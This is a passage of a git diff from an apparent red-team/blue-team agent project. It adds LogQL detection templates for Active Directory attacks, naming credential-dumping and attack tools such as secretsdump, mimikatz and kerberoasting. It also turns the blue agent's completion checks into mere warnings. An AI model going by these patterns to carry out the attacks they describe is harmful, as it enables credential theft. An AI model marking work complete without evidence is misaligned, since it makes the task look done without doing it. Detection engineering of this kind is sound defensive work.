raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{profile}'. Run: aws sso login --profile {profile}" + ) from e + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{profile}'. " + f"Run: aws sso login --profile {profile}" + ) from e + raise + + +def reset_executor() -> None: + """Reset the global executor instance. + + Call this after SSO token refresh to force re-authentication. + """ + global _executor + _executor = None + logger.info("SSM executor reset - will re-authenticate on next use") + + +def run_remote( + command: str | list[str], + timeout_seconds: int = 300, + working_directory: str = "/tmp", # noqa: S108 # nosec B108 +) -> CommandResult: + """Execute a command on the remote Kali instance. + + This is a convenience function that uses the global executor. + + Args: + command: Command string or list of command parts + timeout_seconds: Maximum time to wait + working_directory: Directory to execute in + + Returns: + CommandResult with stdout, stderr, and return code + + Example: + >>> result = run_remote("netexec smb 10.1.2.219 --shares") + >>> print(result.stdout) + """ + executor = get_executor() + return executor.run_command(command, timeout_seconds, working_directory) diff --git a/src/ares/main.py b/src/ares/main.py index b5071740..04a5260d 100644 --- a/src/ares/main.py +++ b/src/ares/main.py @@ -195,7 +195,6 @@ async def main( except Exception as e: logger.error(f"Investigation failed: {e}") - dn.log_metric("investigation_failed", 1, mode="count") # If running in once mode, exit after processing current alerts if args.once: diff --git a/src/ares/tools/blue/__init__.py b/src/ares/tools/blue/__init__.py index ccbf7e4e..76b4f07c 100644 --- a/src/ares/tools/blue/__init__.py +++ b/src/ares/tools/blue/__init__.py @@ -4,6 +4,7 @@ from ares.tools.blue.grafana import GrafanaTools, connect_grafana_mcp from ares.tools.blue.investigation import InvestigationTools, QuestionEngineTools from ares.tools.blue.observability import LokiTools, PrometheusTools +from ares.tools.blue.query_templates import QueryTemplateTools __all__ = [ "CompletionTools", @@ -11,6 +12,7 @@ "InvestigationTools", "LokiTools", "PrometheusTools", + "QueryTemplateTools", "QuestionEngineTools", "connect_grafana_mcp", "escalate_investigation", diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py index c9ff3711..b45e5b7c 100644 --- a/src/ares/tools/blue/actions.py +++ b/src/ares/tools/blue/actions.py @@ -65,67 +65,29 @@ async def complete_investigation( ... ) 'Investigation completed. Report will be generated.' """ - errors = [] + warnings = [] # Validate state exists if not self.state: return "ERROR: No investigation state. Cannot complete." - # Validate lateral investigation was performed + # Log stage warning but don't block if self.state.stage.value not in ["lateral", "synthesis"]: - errors.append( - f"ERROR: Must reach 'lateral' stage before completion. " - f"Current stage: {self.state.stage.value}. " - f"Call transition_stage('lateral') after investigating scope." + warnings.append( + f"Note: Investigation completed at '{self.state.stage.value}' stage " + f"(ideally should reach 'lateral' stage for thorough analysis)." ) - # Validate hosts were investigated + # Log if no hosts were investigated if not self.state.queried_hosts and not affected_hosts: - errors.append( - "ERROR: No hosts investigated. Use track_host_investigation() " - "to investigate affected hosts before completing." + warnings.append( + "Note: No specific hosts were investigated. Consider investigating " + "affected hosts in future investigations." ) - # Validate affected_hosts is not empty - if not affected_hosts: - errors.append( - "ERROR: affected_hosts is required. Provide the list of " - "hosts/IPs involved in the attack." - ) - - # Validate affected_users is not empty - if not affected_users: - errors.append( - "ERROR: affected_users is required. Provide the list of " - "user accounts involved in the attack." - ) - - # Validate attack_timeframe is specific - if not attack_timeframe or len(attack_timeframe) < 10: - errors.append( - "ERROR: attack_timeframe must be specific (e.g., '2024-01-08 04:37-04:43 UTC'). " - "This should reflect the ACTUAL event timestamps from your investigation." - ) - - # Validate synopsis is substantive - if len(attack_synopsis) < 100: - errors.append( - "ERROR: attack_synopsis too short. Provide a detailed description " - "of the attack chain including: initial access, techniques used, " - "and impact." - ) - - # Validate evidence was collected - if len(self.state.evidence) < 2: - errors.append( - f"ERROR: Insufficient evidence ({len(self.state.evidence)} items). " - "Continue investigation to gather more evidence." - ) - - # If errors, return them all - if errors: - dn.log_metric("completion_validation_failed", 1) - return "\n\n".join(errors) + # Log warnings (but don't block completion) + for warning in warnings: + logger.warning(warning) # All validations passed dn.log_metric("investigation_completed", 1) diff --git a/src/ares/tools/blue/grafana.py b/src/ares/tools/blue/grafana.py index bde0bee1..c466f3d9 100644 --- a/src/ares/tools/blue/grafana.py +++ b/src/ares/tools/blue/grafana.py @@ -4,6 +4,7 @@ import shutil import subprocess # nosec B404 from pathlib import Path +from typing import Any import dreadnode as dn import httpx @@ -130,7 +131,7 @@ def find_mcp_grafana() -> str: async def connect_grafana_mcp( grafana_url: str | None = None, grafana_api_key: str | None = None, -): # type: ignore[no-untyped-def] +) -> Any: """ Connect to Grafana MCP server via Rigging. diff --git a/src/ares/tools/blue/query_templates.py b/src/ares/tools/blue/query_templates.py new file mode 100644 index 00000000..105f0738 --- /dev/null +++ b/src/ares/tools/blue/query_templates.py @@ -0,0 +1,1966 @@ +"""Pre-built query templates for detecting red team attack patterns. + +Provides ready-to-use LogQL queries mapped to MITRE ATT&CK techniques, +specifically designed to detect attacks performed by the Ares red team agent. +""" + +from datetime import datetime, timedelta, timezone +from typing import Any + +import dreadnode as dn +import httpx +from dreadnode.agent.tools.base import Toolset +from loguru import logger + + +class QueryTemplateTools(Toolset): # type: ignore[misc] + """Pre-built query templates for detecting red team attack patterns. + + These templates encode detection logic for Active Directory attacks, + specifically aligned with the techniques used by the Ares red team agent: + - Network enumeration (nmap, user/share enumeration) + - Credential access (secretsdump, kerberoasting, AS-REP roasting) + - Lateral movement (pass-the-hash, psexec, wmi) + - Privilege escalation (ADCS, delegation, golden ticket) + + Attributes: + loki_url: Base URL of the Loki instance. + timeout: HTTP request timeout in seconds. + """ + + loki_url: str + timeout: int = 30 + + async def _query_loki( + self, + logql: str, + start_time: str, + end_time: str, + limit: int = 500, + ) -> dict[str, Any]: + """Execute a LogQL query against Loki.""" + # Validate query to prevent empty-compatible regex errors + if '=~".*"' in logql or "=~'.*'" in logql: + return { + "status": "error", + "error": "Query contains empty-compatible regex '.*'. Use '.+' instead.", + } + + try: + async with httpx.AsyncClient(timeout=self.timeout) as client: + response = await client.get( + f"{self.loki_url}/loki/api/v1/query_range", + params={ + "query": logql, + "start": start_time, + "end": end_time, + "limit": limit, + }, + ) + response.raise_for_status() + return response.json() + except httpx.HTTPError as e: + logger.error(f"Loki query failed: {e}") + return {"status": "error", "error": str(e), "data": {"result": []}} + + def _get_time_range(self, hours_back: int = 24) -> tuple[str, str]: + """Get ISO8601 time range for queries.""" + now = datetime.now(timezone.utc) + start = now - timedelta(hours=hours_back) + return start.isoformat(), now.isoformat() + + def _count_results(self, result: dict) -> int: + """Count total log entries in result.""" + streams = result.get("data", {}).get("result", []) + return sum(len(s.get("values", [])) for s in streams) + + # ========================================================================= + # RECONNAISSANCE & DISCOVERY (TA0007) + # Maps to: nmap_scan, enumerate_users, enumerate_shares + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_port_scanning( + self, + target_ip: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect network port scanning activity (nmap, masscan). + + Detects reconnaissance performed by red team's nmap_scan tool. + Looks for rapid connection attempts to multiple ports. + + MITRE ATT&CK: T1046 (Network Service Discovery) + + Args: + target_ip: Optional IP to focus detection on. + hours_back: Hours of logs to search (default 24). + + Returns: + Query results with port scanning indicators. + """ + dn.log_metric("query_template_port_scan", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Detect nmap signatures, SYN scans, rapid connection attempts + logql = '{job=~".+"} |~ "(?i)(nmap|masscan|syn.*scan|port.*scan|connection.*refused)"' + + if target_ip: + logql += f' |~ "{target_ip}"' + + logger.info(f"Port scanning detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "port_scanning" + result["_mitre_technique"] = "T1046" + result["_red_team_tool"] = "nmap_scan" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_user_enumeration( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Active Directory user enumeration. + + Detects reconnaissance performed by red team's enumerate_users tool (netexec --users). + Looks for LDAP queries, net user commands, and SMB-based enumeration. + + MITRE ATT&CK: T1087.002 (Account Discovery: Domain Account) + + Args: + domain_controller: Optional DC hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with user enumeration indicators. + """ + dn.log_metric("query_template_user_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4662: Object access (LDAP queries) + # Event 4798: User's group membership enumerated + # Event 4799: Security-enabled group membership enumerated + # netexec, crackmapexec, ldapsearch signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4662|4798|4799|samr|lsarpc|ldap|net.*user|net.*group)"' + ' |~ "(?i)(enumerate|query|lookup|search|crackmapexec|netexec|ldapsearch)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"User enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "user_enumeration" + result["_mitre_technique"] = "T1087.002" + result["_red_team_tool"] = "enumerate_users" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_share_enumeration( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect SMB share enumeration. + + Detects reconnaissance performed by red team's enumerate_shares tool (netexec --shares). + Looks for share listing, access attempts, and smbclient activity. + + MITRE ATT&CK: T1135 (Network Share Discovery) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with share enumeration indicators. + """ + dn.log_metric("query_template_share_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 5140: Network share accessed + # Event 5145: Detailed file share access + # smbclient, netexec signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5140|5145|srvsvc|netuse|net.*share|net.*view)"' + ' |~ "(?i)(smbclient|crackmapexec|netexec|enum.*share|share.*enum)"' + ) + + if target_host: + logql += f' |~ "(?i){target_host}"' + + logger.info(f"Share enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "share_enumeration" + result["_mitre_technique"] = "T1135" + result["_red_team_tool"] = "enumerate_shares" + + return result + + # ========================================================================= + # CREDENTIAL ACCESS (TA0006) + # Maps to: secretsdump, kerberoast, asrep_roast, crack_with_hashcat + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_secretsdump( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect credential dumping via impacket-secretsdump. + + Detects red team's secretsdump tool which extracts: + - SAM database (local accounts) + - LSA secrets + - NTDS.dit (domain accounts) + - Cached domain credentials + + MITRE ATT&CK: T1003 (OS Credential Dumping) + Sub-techniques: T1003.001 (LSASS), T1003.002 (SAM), T1003.003 (NTDS), T1003.004 (LSA) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with secretsdump indicators. + """ + dn.log_metric("query_template_secretsdump", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # DRSUAPI for DCSync, SAMR for SAM dump, registry access for LSA secrets + # Event 4624 Type 3 from unusual source, Event 4662 (DS-Replication-Get-Changes) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(drsuapi|samr|secretsdump|lsadump|ntds\\.dit|sam.*dump)"' + ' |~ "(?i)(replicate|1131f6|ds-replication|mimikatz|impacket)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Secretsdump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "secretsdump" + result["_mitre_technique"] = "T1003" + result["_mitre_subtechniques"] = ["T1003.001", "T1003.002", "T1003.003", "T1003.004"] + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_dcsync( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect DCSync attack (secretsdump against DC). + + DCSync allows attackers with replication rights to extract all domain credentials + including krbtgt hash (enables golden ticket). Critical to detect. + + MITRE ATT&CK: T1003.006 (DCSync) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with DCSync indicators. + """ + dn.log_metric("query_template_dcsync", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4662 with specific GUIDs for replication + # 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes + # 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes-All + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4662|dcsync|ds-replication|1131f6aa|1131f6ad)"' + ' |~ "(?i)(replication|drsuapi|directory.*service.*access)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"DCSync detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "dcsync" + result["_mitre_technique"] = "T1003.006" + result["_red_team_tool"] = "secretsdump" + result["_severity"] = "critical" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_kerberoasting( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Kerberoasting attack (impacket-GetUserSPNs). + + Detects red team's kerberoast tool which requests TGS tickets for + service accounts with SPNs. These tickets can be cracked offline. + + MITRE ATT&CK: T1558.003 (Kerberoasting) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with Kerberoasting indicators. + """ + dn.log_metric("query_template_kerberoast", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4769: Kerberos Service Ticket Request + # Look for: RC4 encryption (type 0x17), many TGS requests, SPN patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4769|kerberos.*ticket|tgs.*request|getuserspn)"' + ' |~ "(?i)(service.*ticket|spn|rc4|0x17|kerberoast)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Kerberoasting detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "kerberoasting" + result["_mitre_technique"] = "T1558.003" + result["_red_team_tool"] = "kerberoast" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_asrep_roasting( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect AS-REP Roasting attack (impacket-GetNPUsers). + + Detects red team's asrep_roast tool which targets accounts with + 'Do not require Kerberos preauthentication' enabled. + + MITRE ATT&CK: T1558.004 (AS-REP Roasting) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with AS-REP roasting indicators. + """ + dn.log_metric("query_template_asrep", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4768: Kerberos TGT Request (AS-REQ) + # Event 4771: Kerberos Pre-Authentication Failed + # Look for requests without pre-auth, RC4 encryption + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4768|4771|as-req|getnpusers|asrep)"' + ' |~ "(?i)(pre.*auth|tgt.*request|roast|dont.*require.*preauth)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"AS-REP roasting detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "asrep_roasting" + result["_mitre_technique"] = "T1558.004" + result["_red_team_tool"] = "asrep_roast" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_brute_force( + self, + target_host: str | None = None, + hours_back: int = 24, + threshold: int = 10, + ) -> dict[str, Any]: + """Detect brute force and password spray attacks. + + Detects credential stuffing attempts from red team's authentication tests. + Looks for multiple failed logins from same source or against multiple accounts. + + MITRE ATT&CK: T1110 (Brute Force), T1110.003 (Password Spraying) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + threshold: Minimum failures to flag (default 10). + + Returns: + Query results with auth failure analysis. + """ + dn.log_metric("query_template_brute_force", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4625: Failed Logon + # Event 4771: Kerberos Pre-Auth Failed + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4625|4771|failed|invalid|denied)"' + ' |~ "(?i)(logon|auth|password|credential)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Brute force detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + + # Analyze patterns + total_failures = self._count_results(result) + result["_analysis"] = { + "total_failures": total_failures, + "is_likely_attack": total_failures >= threshold, + "recommendation": ( + "High auth failure volume - investigate source IPs and target accounts" + if total_failures >= threshold + else "Normal failure volume" + ), + } + result["_query_template"] = "brute_force" + result["_mitre_technique"] = "T1110" + + return result + + # ========================================================================= + # LATERAL MOVEMENT (TA0008) + # Maps to: domain_admin_checker (pass-the-hash), netexec + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_pass_the_hash( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Pass-the-Hash attacks. + + Detects red team's domain_admin_checker using NTLM hashes for auth. + Looks for NTLM authentications without corresponding password usage. + + MITRE ATT&CK: T1550.002 (Pass the Hash) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with PtH indicators. + """ + dn.log_metric("query_template_pth", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4624 with NTLM auth (LogonType 3 or 9, NtLmSsp) + # Look for hash-based auth patterns from netexec/crackmapexec + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4624|ntlm|ntlmssp|pass.*the.*hash)"' + ' |~ "(?i)(logon.*type.*3|network.*logon|crackmapexec|netexec)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Pass-the-Hash detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "pass_the_hash" + result["_mitre_technique"] = "T1550.002" + result["_red_team_tool"] = "domain_admin_checker" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_lateral_movement( + self, + source_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect lateral movement patterns. + + Detects various lateral movement techniques used during post-exploitation: + - PSExec service creation + - WMI execution + - WinRM/PowerShell remoting + - SMB admin share access + + MITRE ATT&CK: T1021 (Remote Services) + + Args: + source_host: Optional source to pivot from. + hours_back: Hours of logs to search. + + Returns: + Query results with lateral movement indicators. + """ + dn.log_metric("query_template_lateral", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 7045: Service installed + # Event 4648: Explicit credential logon + # Event 4624 Type 3: Network logon + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|4648|psexec|wmic|winrm|powershell.*-session)"' + ' |~ "(?i)(admin\\$|c\\$|ipc\\$|service.*install|remote.*execution)"' + ) + + if source_host: + logql += f' |~ "(?i){source_host}"' + + logger.info(f"Lateral movement detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "lateral_movement" + result["_mitre_technique"] = "T1021" + result["_mitre_subtechniques"] = ["T1021.002", "T1021.003", "T1021.006"] + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_smb_file_access( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect suspicious file access on SMB shares. + + Detects red team's share pilfering tools (enumerate_share_files, download_file_content). + Looks for access to sensitive files like scripts, configs, GPP XML. + + MITRE ATT&CK: T1039 (Data from Network Shared Drive) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with file access indicators. + """ + dn.log_metric("query_template_smb_access", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 5145: Detailed file share access + # Look for sensitive file extensions and paths + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5145|file.*access|share.*access|smbclient)"' + ' |~ "(?i)(\\.ps1|\\.bat|\\.cmd|\\.xml|\\.config|sysvol|netlogon|groups\\.xml)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"SMB file access detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "smb_file_access" + result["_mitre_technique"] = "T1039" + result["_red_team_tools"] = ["enumerate_share_files", "download_file_content"] + + return result + + # ========================================================================= + # PRIVILEGE ESCALATION (TA0004) + # Maps to: certipy (ADCS), delegation tools, bloodhound + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_adcs_exploitation( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ADCS certificate abuse (ESC1-ESC15). + + Detects red team's certipy tools exploiting certificate template misconfigurations. + ESC1 is particularly dangerous - allows requesting certs for any user. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ADCS exploitation indicators. + """ + dn.log_metric("query_template_adcs", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4886: Certificate request submitted + # Event 4887: Certificate Services approved certificate request + # Look for certipy patterns, suspicious certificate requests + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4886|4887|4876|certipy|certificate.*request)"' + ' |~ "(?i)(esc[0-9]|enrollee.*supplies.*subject|altname|upn)"' + ) + + logger.info(f"ADCS exploitation detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "adcs_exploitation" + result["_mitre_technique"] = "T1649" + result["_red_team_tools"] = ["certipy_find", "certipy_req_esc1", "certipy_auth"] + result["_severity"] = "high" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_delegation_abuse( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Kerberos delegation attacks (RBCD, unconstrained, constrained). + + Detects red team's delegation tools for privilege escalation: + - Resource-Based Constrained Delegation (RBCD) + - Unconstrained delegation exploitation + - S4U2Self/S4U2Proxy abuse + + MITRE ATT&CK: T1134.001 (Token Impersonation/Theft) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with delegation abuse indicators. + """ + dn.log_metric("query_template_delegation", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Look for: msDS-AllowedToActOnBehalfOfOtherIdentity modification + # S4U2Self/S4U2Proxy ticket requests, delegation attribute changes + logql = ( + '{job=~".+"}' + ' |~ "(?i)(delegation|msds-allowedtoactonbehalf|rbcd|s4u2)"' + ' |~ "(?i)(impersonate|constrained|unconstrained|getst|addcomputer)"' + ) + + logger.info(f"Delegation abuse detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "delegation_abuse" + result["_mitre_technique"] = "T1134.001" + result["_red_team_tools"] = ["find_delegation", "add_computer", "rbcd_write", "get_st"] + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_collection( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound/SharpHound data collection. + + Detects red team's BloodHound collection which maps AD relationships + to find privilege escalation paths. + + MITRE ATT&CK: T1087 (Account Discovery), T1069 (Permission Groups Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with BloodHound collection indicators. + """ + dn.log_metric("query_template_bloodhound", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # LDAP enumeration patterns, BloodHound/SharpHound signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(bloodhound|sharphound|adexplorer|ldap.*query)"' + ' |~ "(?i)(acl|objectsid|memberof|primarygroup|msds)"' + ) + + logger.info(f"BloodHound collection detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_collection" + result["_mitre_techniques"] = ["T1087", "T1069", "T1482"] + result["_red_team_tool"] = "run_bloodhound" + + return result + + # ========================================================================= + # PERSISTENCE (TA0003) + # Maps to: golden_ticket + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_golden_ticket( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Golden Ticket creation and usage. + + Detects red team's golden ticket generation (impacket-ticketer). + Golden tickets provide persistent domain admin access using krbtgt hash. + + MITRE ATT&CK: T1558.001 (Golden Ticket) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with Golden Ticket indicators. + """ + dn.log_metric("query_template_golden_ticket", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4769 with suspicious patterns (krbtgt access, invalid timestamps) + # Look for ticketer tool patterns, krbtgt references + logql = ( + '{job=~".+"}' + ' |~ "(?i)(golden.*ticket|krbtgt|ticketer|krbcred)"' + ' |~ "(?i)(forged|4769|kerberos.*ticket|enterprise.*admin)"' + ) + + logger.info(f"Golden ticket detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "golden_ticket" + result["_mitre_technique"] = "T1558.001" + result["_red_team_tool"] = "generate_golden_ticket" + result["_severity"] = "critical" + + return result + + # ========================================================================= + # EXECUTION (TA0002) + # Maps to: general command execution patterns + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_suspicious_execution( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect suspicious command execution. + + Detects encoded PowerShell, LOLBins, and script interpreter abuse + commonly used during post-exploitation. + + MITRE ATT&CK: T1059 (Command and Scripting Interpreter) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with execution indicators. + """ + dn.log_metric("query_template_execution", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4688: Process Creation (with command line logging) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4688|powershell|pwsh|cmd\\.exe|wscript|cscript)"' + ' |~ "(?i)(encodedcommand|bypass|hidden|downloadstring|invoke)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Suspicious execution detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "suspicious_execution" + result["_mitre_technique"] = "T1059" + + return result + + # ========================================================================= + # ADCS/CERTIPY SPECIFIC DETECTIONS (ESC1-ESC11) + # Maps to: certipy_find, certipy_req_esc1, certipy_auth + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_certipy_enumeration( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Certipy certificate template enumeration. + + Detects red team's certipy_find tool scanning for vulnerable certificate + templates. This is the reconnaissance phase before ADCS exploitation. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with Certipy enumeration indicators. + """ + dn.log_metric("query_template_certipy_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Certipy enumeration queries LDAP for certificate templates + # Look for: msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag queries + logql = ( + '{job=~".+"}' + ' |~ "(?i)(certipy|ldap|389|636)"' + ' |~ "(?i)(mspki|pkienrollmentservice|certificatetemplates|pki)"' + ) + + logger.info(f"Certipy enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "certipy_enumeration" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_find" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc1_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC1 - Enrollee Supplies Subject attack. + + ESC1 allows attackers to request certificates with arbitrary Subject + Alternative Names (SANs), enabling impersonation of any user including + Domain Admins. This is the most critical ADCS vulnerability. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC1 attack indicators. + """ + dn.log_metric("query_template_esc1", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC1 indicators: + # - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in template + # - Certificate request with SAN different from requester + # - Event 4886/4887 with suspicious SAN + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4886|4887|certificate.*request|certipy)"' + ' |~ "(?i)(san=|subjectaltname|upn=|enrollee.*supplies|ct_flag)"' + ) + + logger.info(f"ESC1 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc1_attack" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_req_esc1" + result["_severity"] = "critical" + result["_description"] = "ESC1: Enrollee supplies subject - allows impersonation" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc4_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC4 - Vulnerable Certificate Template ACL attack. + + ESC4 exploits misconfigured ACLs on certificate templates where low-priv + users have write access to modify template settings. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC4 attack indicators. + """ + dn.log_metric("query_template_esc4", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC4 involves modifying certificate template attributes + # Event 5136: Directory service object modified (on certificate template) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5136|ldap.*modify|template.*modif)"' + ' |~ 